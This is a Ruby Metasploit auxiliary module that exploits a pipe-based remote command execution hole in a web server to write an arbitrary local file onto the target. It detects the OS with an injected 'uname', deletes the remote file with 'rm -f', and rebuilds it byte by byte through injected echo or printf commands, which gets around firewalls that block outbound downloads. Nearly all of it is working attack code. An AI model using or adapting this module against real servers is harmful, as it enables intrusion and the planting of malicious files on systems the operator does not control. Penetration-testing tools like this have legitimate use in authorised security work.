perlpipe_rce_to_file_osdetect.rb

##
# $Id: perlpipe_rce_to_file_osdetect.rb 13018 2011-06-24 14:43:59Z oxagast $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'net/http'
require 'uri'
require 'digest/md5'

class Metasploit3 < Msf::Auxiliary
    include Msf::Auxiliary::Report
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'Uses RCE on a webserver to upload files',
            'Description' => %q{
                    This module pushes data into a file with webserver RCE bugs that block downloading
                        from external sources due to firewall rules.
            },
            'Author' => [ 'Marshall Whittaker <oxagast [at] gmail.com>' ],
            'License' => MSF_LICENSE,
            'Version' => '$Revision: 13581 $'
        ))
        register_options(
            [
                OptString.new('DOMAIN', [ true, "The domain"]),
                OptString.new('REMOTEFILE', [ true, "Where to output the file on the remote server"]),
                OptString.new('LOCALFILE', [ true, "Location of the file you wish to send"]),
                OptString.new('FIRSTPART', [ true, "First part of the url"]),
                OptString.new('LASTPART', [ false, "Last part of the url"]),
            ], self.class)

        register_advanced_options(
            [
                OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
                OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
                OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
            ], self.class)

    end

    def run
        if datastore['PROXY']
            @proxysrv,@proxyport = datastore['PROXY'].split(":")
            @proxyuser = datastore['PROXY_USER']
            @proxypass = datastore['PROXY_PASS']
        else
            @proxysrv,@proxyport = nil, nil
        end


        chunksize = 1
        part2 = ""
        hexxydots = (chunksize * 5)
        thisurl = datastore['DOMAIN']
        localfilepath = datastore['LOCALFILE']
        remotefilepath = datastore['REMOTEFILE']
        part1 = datastore['FIRSTPART']
        part2 = datastore['LASTPART']
        thefile = open(localfilepath, "rb") {|io| io.read}
        md5checksum = Digest::MD5.hexdigest(thefile)
                url = URI.parse(thisurl)
                oschecker = Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode("#{part1}|uname|#{part2}"))}

        if oschecker.body =~ /Linux/
        oscheck = 0
        end
        if oschecker.body =~ /BSD/
        oscheck = 1
        end
        if oschecker.body =~ /Solaris/
        oscheck = 2
        end
        if oschecker.body =~ /SunOS/
        oscheck = 2
        end

        if oscheck == 0
        print_status "Detected OS : Linux"
        hexer = (thefile.unpack('H2'*thefile.length).collect {|val| "\\\\x" + val}).join
        hexxy = hexer.scan(/.{#{hexxydots}}/)
        inchunks = hexxy.each_slice(chunksize).to_a
        url1 = URI.parse(thisurl)
        print_status "Trying to remove remote file"
        Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
        print_status "Sending file #{localfilepath}"
        for i in 0..inchunks.length - 1
            toecho = "#{part1}|echo -n -e \"#{inchunks[i].join}\" >> #{remotefilepath}|#{part2}"
            url = URI.parse(thisurl)
            Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
        end
        checkedsum = Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode("#{part1}|md5sum #{remotefilepath}|#{part2}"))}
        if checkedsum.body =~ /#{Regexp.escape(md5checksum)}/
            print_status "MD5 checksum matches"
        end
        end

        if oscheck == 1
        print_status "Detected OS : BSD"
        hexer = (thefile.unpack('H2'*thefile.length)).collect {|hexstuff| "0x" + hexstuff.to_s}
        octal=[]
        for hexroll in 0..hexer.length - 1
        octalstr = "\\0%o" % hexer[hexroll]
        octal.push(octalstr)
        end
        url1 = URI.parse(thisurl)
                print_status "Trying to remove remote file"
        Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
        print_status "Sending file #{localfilepath}"
        for i in 0..octal.length - 1
            toecho = "#{part1}|printf \"#{octal[i]}\" >> #{remotefilepath}|#{part2}"
            url = URI.parse(thisurl)
            Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
        end
        end

        if oscheck == 2
        print_status "Detected OS : SunOS/Solaris"
        hexer = (thefile.unpack('H2'*thefile.length)).collect {|hexstuff| "0x" + hexstuff.to_s}
        octal=[]
        for hexroll in 0..hexer.length - 1
        octalstr = "\\%04o" % hexer[hexroll]
        octal.push(octalstr)
        end
        url1 = URI.parse(thisurl)
                print_status "Trying to remove remote file"
        Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
        print_status "Sending file #{localfilepath}"
        for i in 0..octal.length - 1
            toecho = "#{part1}|echo \"#{octal[i]}\\c\" >> #{remotefilepath}|#{part2}"
            url = URI.parse(thisurl)
            Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
        end
        end

    end
end